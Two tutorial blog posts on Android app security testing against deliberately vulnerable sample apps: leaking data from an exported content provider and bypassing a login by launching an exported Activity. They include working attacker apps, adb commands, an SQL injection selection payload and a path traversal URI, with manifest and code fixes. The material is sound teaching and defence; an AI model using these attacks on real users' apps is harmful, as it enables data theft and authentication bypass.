Friday, 25 April 2014

Exploiting Content Provider Leakage

0 comments Posted by srini0x00 on 06:13

Introduction

In the previous article, we discussed how an attacker exploits vulnerable Activity components and how to secure them. In this article, we will discuss "Content Provider Leakage".

What are content Providers?

Under Android's security model, application data is private to the application that owns it, so one app cannot read another app's data by default. When an application wants to share data with other applications, a Content Provider is the interface for doing so. Content providers expose data through the standard insert(), query(), update() and delete() methods. Each provider is identified by an authority, addressed with a URI of the form "content://<authority>/<path>". Any app that knows the URI can insert, update, delete and query the provider's data, unless the provider restricts who may call it.
There are cases where a content provider is not meant to share data with other apps at all, or where the developer wants to grant access only to apps holding a particular permission. If the corresponding controls (android:exported, android:permission) are not enforced, the provider leaks the app's data to every other app on the device.
   
The built-in SMS application is a classic example of a content provider. Any app can query the inbox using its URI content://sms/inbox, but the READ_SMS permission must be declared in the app's AndroidManifest.xml for the query to succeed.


Prerequisites to follow the steps:

Computer with Android SDK Installed
A Non Rooted mobile device to install the app.

Test Application’s functionality:

After downloading the test application, install it on the non-rooted Android device in order to test and exploit it.
It can be installed with adb using the following command:
adb install <name of the apk>.apk
The app has a feature to store data inside the application. When we launch it, it appears as shown in the figure.
The goal is to find out whether any content providers are implemented in this app and, if so, to check whether they are vulnerable to data leakage and exploit them.

Topics Involved:

Information gathering
Attacking Vulnerable Content Providers
Securing the applications

Information gathering

Like any other pentest, let's start with information gathering. We assume that we have the APK file with us. So, decompile the downloaded APK file as shown in the previous article and check the AndroidManifest.xml file for any registered content providers. We should also grep the smali files for every "content://" URI used in the app, since the authority and paths are what we need to query the provider.
Content providers are registered in AndroidManifest.xml as <provider> elements inside <application>, with the attributes android:name (the class), android:authorities (the authority part of the content:// URI) and, optionally, android:exported and android:permission.
So let's go ahead and examine the manifest file.
We got one content provider registered in the AndroidManifest.xml file and, for an attacker, the good news is that it has android:exported="true" and no android:permission, so any other app on the device can access it.
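The declaration shape described above, reconstructed here as an added example rather than a copy of the sample app's manifest (the class and authority are the ones found in MyProvider.smali; the package and label are assumptions). This is the vulnerable form: exported, with no permission guarding it.

```xml
<!-- AndroidManifest.xml (excerpt) of the vulnerable sample app.
     Added example; package and label are assumptions. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.isi.contentprovider">

    <application android:label="ContentProvider">

        <!-- android:authorities is what appears after "content://" in the URI.
             android:exported="true" (the default on API level 16 and lower)
             plus no android:permission means ANY app may query, insert,
             update or delete through this provider. -->
        <provider
            android:name="com.isi.contentprovider.MyProvider"
            android:authorities="com.isi.contentprovider.MyProvider"
            android:exported="true" />

    </application>
</manifest>
```

When reviewing a manifest, treat every <provider> that is exported (explicitly, or implicitly because of a low minSdkVersion/targetSdkVersion) and carries no android:permission, android:readPermission or android:writePermission as a finding to verify.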

Attacking Vulnerable Content Providers

This is the most interesting part. Let's now try to query the content provider we found from a context that holds none of the app's permissions. If it returns data, the provider is leaking. This can be done in multiple ways:
1. Using adb shell
2. Using a malicious app to query it
3. Using the Mercury framework (since renamed drozer)
Using adb:
To query the content provider from adb, the app should be installed on the device. 
Get an adb shell on the device and type the following command to query the content provider. In my case, I am going to query the URI I found in MyProvider.smali, which was extracted by apktool. (The content command runs as the shell user, uid 2000, which holds no app-specific permissions, so a successful query proves the provider is reachable without any.)

content query --uri content://com.isi.contentprovider.MyProvider/udetails
We should now see all the details stored in the app's database, as shown in the figure below.




Using a Malicious app to query:
We can even write a malicious app to query the data from the content provider; the same code queries the SMS inbox if the app declares READ_SMS. Following is the code to perform the query.
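An added example of such a malicious app (not the original post's snippet): it queries the URI recovered from MyProvider.smali and dumps every row and column to logcat. The package name, class name and log tag are assumptions; the app declares no permissions at all, so any data it receives is data the provider leaks.

```java
// Added example, not code from the original post. Package, class and tag
// names are assumptions; the target URI is the one found in MyProvider.smali.
package com.attacker.providerdump;

import android.app.Activity;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class DumpActivity extends Activity {
    private static final String TAG = "ProviderDump";

    // Vulnerable provider from the article (no permission needed to query it).
    private static final Uri TARGET =
            Uri.parse("content://com.isi.contentprovider.MyProvider/udetails");

    // Built-in SMS provider: the same call works, but only if this app adds
    // <uses-permission android:name="android.permission.READ_SMS"/> to its manifest.
    private static final Uri SMS_INBOX = Uri.parse("content://sms/inbox");

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        dump(TARGET);
        // dump(SMS_INBOX);   // uncomment after declaring READ_SMS
    }

    // Issues the equivalent of "SELECT *" against the provider: no projection,
    // no selection and no sort order. Column names are unknown in a black-box
    // test, so whatever the cursor reports is printed.
    private void dump(Uri uri) {
        Cursor c = null;
        try {
            c = getContentResolver().query(uri, null, null, null, null);
            if (c == null) {
                Log.w(TAG, "no cursor returned for " + uri);
                return;
            }
            String[] cols = c.getColumnNames();
            Log.i(TAG, "columns: " + java.util.Arrays.toString(cols));
            while (c.moveToNext()) {
                StringBuilder row = new StringBuilder();
                for (int i = 0; i < cols.length; i++) {
                    row.append(cols[i]).append('=').append(c.getString(i)).append("  ");
                }
                Log.i(TAG, row.toString());   // read with: adb logcat -s ProviderDump
            }
        } catch (SecurityException e) {
            // Raised when the provider is not exported, or requires a permission
            // this app does not hold. For a correctly secured provider this is
            // the expected outcome.
            Log.e(TAG, "access denied for " + uri + ": " + e.getMessage());
        } finally {
            if (c != null) c.close();
        }
    }
}
```

Note that the manifest of this app needs nothing beyond the activity declaration: if the query on TARGET succeeds, the data leaks to an app that asked for no permissions, which is the point of the test.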

Using Mercury Framework:
The entire process, from enumerating exported providers to querying them, can be carried out with the Mercury framework (since renamed drozer) in an even more efficient and simple way.
Securing the Applications:
1. Setting the android:exported attribute's value to false:
In the AndroidManifest.xml file of our application, we should add android:exported="false" to the <provider> element to be secured. In our case com.isi.contentprovider.MyProvider is the content provider.
If we try to query a content provider whose android:exported value is set to false from another process, the call fails with a SecurityException whose message reports a Permission Denial and states that the provider is not exported from the owning app's uid, as shown below.
Note: For content providers, the default value of android:exported is true when both minSdkVersion and targetSdkVersion are 16 or lower; from API level 17 onwards the default is false. Always set the attribute explicitly rather than relying on the default.
2. Limiting access with custom permissions

We can also impose permission-based restrictions by defining custom permissions for the provider (android:permission, or the finer-grained android:readPermission and android:writePermission). This is helpful if the developer wants to keep the provider exported but limit access to those apps which hold the permission; with protectionLevel="signature", only apps signed with the same certificate can be granted it.

Other issues with Content Providers:

SQL Injection: Even a provider that is meant to be exported can be attacked if its query(), update() or delete() implementation concatenates caller-controlled input (the selection clause, projection, or URI path segments) into SQL. The selection string is passed through the --where option of the content command or the selection argument of ContentResolver.query(), and the attack works just like traditional SQL injection: closing the provider's own WHERE clause and appending a UNION or OR 1=1.
Path Traversal: This is one more attack which can be carried out if a content provider's openFile() builds a filesystem path from the requested URI without validation. It is similar to path traversal on web applications: an attacker supplies a URI whose last segment decodes to something like ../../shared_prefs/secrets.xml and reads files the provider was never meant to serve. Sensitive files can then be copied from the device to the attacker's machine through the vulnerable app.
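An added example (not code from the post or its sample app) of a provider for the udetails table that shows the two issues above side by side: an injectable query and a traversable openFile(), each next to a hardened replacement. The database file name, the column names, the "exports" directory and the visible column are assumptions.

```java
// Added example, not the sample app's MyProvider. Database/column names,
// the "exports" directory and the "visible" column are assumptions.
package com.isi.contentprovider;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;

public class MyProvider extends ContentProvider {
    private static final Map<String, String> PROJECTION_MAP = new HashMap<String, String>();
    static {
        // Only these columns may be selected or referenced in a WHERE clause.
        PROJECTION_MAP.put("_id", "_id");
        PROJECTION_MAP.put("name", "name");
        PROJECTION_MAP.put("email", "email");
    }

    private SQLiteDatabase db;   // opened read-only; the app writes through its own code
    private File exportDir;      // files the provider is allowed to serve

    @Override
    public boolean onCreate() {
        db = SQLiteDatabase.openDatabase(
                getContext().getDatabasePath("udetails.db").getPath(), null,
                SQLiteDatabase.OPEN_READONLY);
        exportDir = new File(getContext().getFilesDir(), "exports");
        return true;
    }

    // ---- SQL injection ----------------------------------------------------
    // VULNERABLE: the caller's selection is pasted into the statement, so
    //   content query --uri content://com.isi.contentprovider.MyProvider/udetails \
    //       --where "visible=1) OR (1=1"
    // returns hidden rows too. Kept only to show the anti-pattern.
    Cursor queryUnsafe(String selection) {
        return db.rawQuery("SELECT * FROM udetails WHERE (visible=1) AND (" + selection + ")", null);
    }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("udetails");
        qb.setProjectionMap(PROJECTION_MAP); // unknown columns (e.g. "pin") are rejected
        qb.setStrict(true);                  // selection is parenthesised and validated
        qb.appendWhere("visible = 1");       // the provider's own restriction, ANDed in
        // Values go through selectionArgs, never into the SQL text.
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    // ---- Path traversal ---------------------------------------------------
    // VULNERABLE: "..%2F..%2Fshared_prefs%2Fsecrets.xml" decodes to
    // "../../shared_prefs/secrets.xml" and walks out of exportDir.
    ParcelFileDescriptor openFileUnsafe(Uri uri) throws FileNotFoundException {
        File f = new File(exportDir, uri.getLastPathSegment());
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) throw new FileNotFoundException("read-only provider");
        File f = new File(exportDir, uri.getLastPathSegment());
        String base, target;
        try {
            // Canonical paths resolve "..", "." and symlinks before the comparison.
            base = exportDir.getCanonicalPath() + File.separator;
            target = f.getCanonicalPath();
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve " + uri);
        }
        if (!target.startsWith(base)) {
            throw new FileNotFoundException("path escapes export directory");
        }
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Read-only provider: no mutation is offered to other apps.
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.isi.udetails"; }
    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int update(Uri uri, ContentValues v, String sel, String[] args) { return 0; }
    @Override public int delete(Uri uri, String sel, String[] args) { return 0; }
}
```

The two checks are independent: the projection map and strict mode stop the selection clause from reaching columns or rows the provider did not intend to expose, and the canonical-path comparison stops openFile() from serving anything outside the export directory. Both still need the manifest-level controls (android:exported or a permission) in front of them.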

Note: You can download the sample application used in this article and follow the steps along with us.

Feel free to post your suggestions and Questions.

Exploiting and Securing Application Components

0 comments Posted by srini0x00 on 05:14

Introduction

Mobile application security is one of the hottest segments in the security world, as the growing number of mobile applications makes their security a real concern. In this article, we will go through the attacks associated with Android application components.

What are Android Application Components?

App components are the essential building blocks of an Android app. Every app is built as a combination of some or all of these components, and each component can be invoked individually, by the app itself or, if exported, by other apps. There are four main components in Android, explained below.

 Activity: An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, Sending an SMS etc.
Example: Login screen of your facebook app.

Service: A Service can perform long-running operations in the background and does not provide a user interface.
Example: Playing Music

Content Providers: A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: Using content providers, any app can read SMS from inbuilt SMS App’s repository in our device.
*READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access SMS app’s data.

Broadcast Receivers: A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts.
This article focuses on demonstrating the methodology to attack and secure vulnerable Activity components of Applications.  

Background:

As shown in the figure below, the test application has two activities. The first activity takes a password as input. If the user enters the correct password, he lands on a page which says "Private Area"; otherwise he gets the message "Wrong password". For test purposes, the password to log in is set to "password". The first screen uses an intent to invoke the second screen when a valid password is entered. We need to perform black-box testing on this app to see whether we can bypass the authentication by invoking the welcome screen directly.

Prerequisites to follow the steps

Computer with Android SDK Installed
A Non Rooted mobile device to install the app.

Topics Involved:

Information gathering
Attacking Vulnerable Activity Components
Securing the applications

Information gathering

1.       Decompile the app with APK tool
2.       Analyze AndroidManifest.xml file for exported Activity components.

Every Android app has a package name, and every Activity has its own class name inside the package. The initial step is to find out the package name and the names of the sensitive activities. Though there are other ways to get this information, looking at AndroidManifest.xml is a good approach. We can get the AndroidManifest.xml file by decompiling the application using apktool.
1.       Download APKTOOL from here
2.       Place the test application in the same folder as in APKTOOL
3.       Now, decompile the apk file using the following command as shown in figure.
apktool d testapp.apk
As shown in the figure below, we should now be able to see a new folder named “testapp” with AndroidManifest.xml file inside it.
Now, we need to search for the package name and its activities.
All the activities are registered in AndroidManifest.xml using <activity></activity> tags, so anything inside these tags is an activity. An activity is reachable from other apps when it has android:exported="true", or when it declares an <intent-filter> and does not set android:exported="false". Looking at the AndroidManifest.xml file, we are able to see two Activity components and the package name, as shown in the figure below.

By examining the above figure, it is clear that we got the following information about the app.
com.isi.testapp is the name of the package.
com.isi.testapp.Welcome could be the activity we are getting after providing the correct password.

Attacking Vulnerable Activity Components

Our job now is to launch Welcome activity without providing any password in the first screen.
We can perform attacks on vulnerable activity components in several ways as mentioned below.
1.       Launching sensitive Activities with Activity Manager Tool.
2.       Using a Malicious App to invoke Activities of other apps.
3.       We can also use Mercury framework for performing these attacks which will be covered in later articles.

Launching sensitive activities with Activity manager tool:

Activity Manager (am) is a tool that comes preinstalled on Android devices and is used from "adb shell". It can start activities and services and send broadcasts, and it can attach actions, data URIs and extras to the intent it sends.
So, let’s begin.
1.       Connect the device to the computer and get a shell on the device using the following command

adb shell

2.       Type in the following command to launch Welcome activity.

am start -n com.isi.testapp/.Welcome

We should now see the welcome screen fired up by am tool without providing the password.

Using a Malicious App to invoke Activities of other apps:

Another way of invoking another application's activities is to write a malicious app and feed it the package name and the activity to be launched. The figure below is a code snippet to launch an activity, where com.isi.testapp.Welcome is the activity to be launched. In our case, the malicious app does not require any permission to launch the "Welcome" activity of the vulnerable app.
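An added example of that malicious app (not the original post's snippet): it builds an explicit intent for com.isi.testapp.Welcome, which is exactly what "am start -n com.isi.testapp/.Welcome" does, and reports whether the launch was allowed. The package, class and tag names of the attacking app are assumptions; it declares no permissions.

```java
// Added example, not code from the original post. The attacking app's
// package, class and log tag are assumptions; the target is the Welcome
// activity identified in the manifest.
package com.attacker.activitylaunch;

import android.app.Activity;
import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

public class LaunchActivity extends Activity {
    private static final String TAG = "ActivityLaunch";

    // Package and fully qualified class of the post-login screen.
    private static final ComponentName TARGET =
            new ComponentName("com.isi.testapp", "com.isi.testapp.Welcome");

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        launch(TARGET);
    }

    // Explicit intent: no action, no data, no intent-filter matching needed.
    // The only thing standing between this call and the activity is
    // android:exported / android:permission on the target's manifest entry.
    private void launch(ComponentName target) {
        Intent intent = new Intent();
        intent.setComponent(target);
        try {
            startActivity(intent);
            Log.i(TAG, "launched " + target.flattenToShortString() + " without a password");
        } catch (SecurityException e) {
            // Target has android:exported="false" or requires a permission we lack.
            Log.e(TAG, "blocked: " + e.getMessage());
        } catch (ActivityNotFoundException e) {
            // Wrong package/class, or the target app is not installed.
            Log.e(TAG, "not found: " + e.getMessage());
        }
    }
}
```

After installing both apps, "adb logcat -s ActivityLaunch" shows which branch was taken; the "launched" line on the unpatched test app is the authentication bypass, and the "blocked" line is what the hardening in the next section produces.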


Using Mercury framework:

The same attack can be reproduced with mercury framework. We will discuss mercury framework later in this series.

Securing the application components

1.       Setting up android:exported attribute’s value to false

In the AndroidManifest.xml file of our application, we should add android:exported="false" to the <activity> element to be secured. In our case com.isi.testapp.Welcome is the activity to be secured.
This restricts any other application or system component from starting the Activity; only the app itself, and applications sharing its user id (android:sharedUserId with the same signing key), can start it. The launcher activity must stay exported, since the home screen has to be able to start it.

2.       Limiting access with custom permissions

The android:exported attribute is not the only way to limit an activity's exposure to other applications. We can also impose permission-based restrictions by defining a custom permission and requiring it on the activity with android:permission. This is helpful if the developer wants to keep a component exported but limit access to those apps which hold the permission; with protectionLevel="signature", only apps signed with the same certificate can be granted it.
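The manifest changes described in this section and in the "Securing the Applications" section of the content provider article, given together as an added example rather than as the sample apps' real manifests. The activity excerpt belongs to com.isi.testapp, the provider excerpt to com.isi.contentprovider; the permission name, labels and MainActivity name are assumptions.

```xml
<!-- Added example, not the sample apps' manifests. Permission name, labels
     and the MainActivity class are assumptions. -->

<!-- AndroidManifest.xml of com.isi.testapp (excerpt): protecting an Activity -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.isi.testapp">

    <!-- Custom permission. protectionLevel="signature" means the system only
         grants it to apps signed with the same certificate as this one, so a
         malicious app cannot simply request it in its own manifest. -->
    <permission
        android:name="com.isi.testapp.permission.PRIVATE_AREA"
        android:protectionLevel="signature" />

    <application android:label="testapp">

        <!-- Login screen: must stay exported so the launcher can start it -->
        <activity android:name=".MainActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!-- Option 1: not exported. "am start -n com.isi.testapp/.Welcome"
             and the malicious app now fail with a SecurityException. -->
        <activity android:name=".Welcome" android:exported="false" />

        <!-- Option 2 (alternative to option 1): exported, but gated by the
             custom permission, for the case where trusted sibling apps must
             be able to open it. -->
        <!--
        <activity android:name=".Welcome"
            android:exported="true"
            android:permission="com.isi.testapp.permission.PRIVATE_AREA" />
        -->
    </application>
</manifest>

<!-- AndroidManifest.xml of com.isi.contentprovider (excerpt): the same two
     controls applied to the leaking provider from the first article -->
<provider
    android:name="com.isi.contentprovider.MyProvider"
    android:authorities="com.isi.contentprovider.MyProvider"
    android:exported="false" />

<!-- or, if other apps legitimately read it, require a signature permission
     (readPermission/writePermission split read and write access) -->
<!--
<permission
    android:name="com.isi.contentprovider.permission.READ_UDETAILS"
    android:protectionLevel="signature" />
<provider
    android:name="com.isi.contentprovider.MyProvider"
    android:authorities="com.isi.contentprovider.MyProvider"
    android:exported="true"
    android:readPermission="com.isi.contentprovider.permission.READ_UDETAILS" />
-->
```

Re-run the earlier checks after the change: "am start -n com.isi.testapp/.Welcome" and "content query --uri content://com.isi.contentprovider.MyProvider/udetails" from adb shell should both now fail with a Permission Denial, and the launcher activity should still open normally.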
Note: The above security controls are applicable to any other Application component which we discussed in the beginning of the article.

Note: You can download the sample application used in this article and follow the steps along with us.

Feel free to post your suggestions and Questions.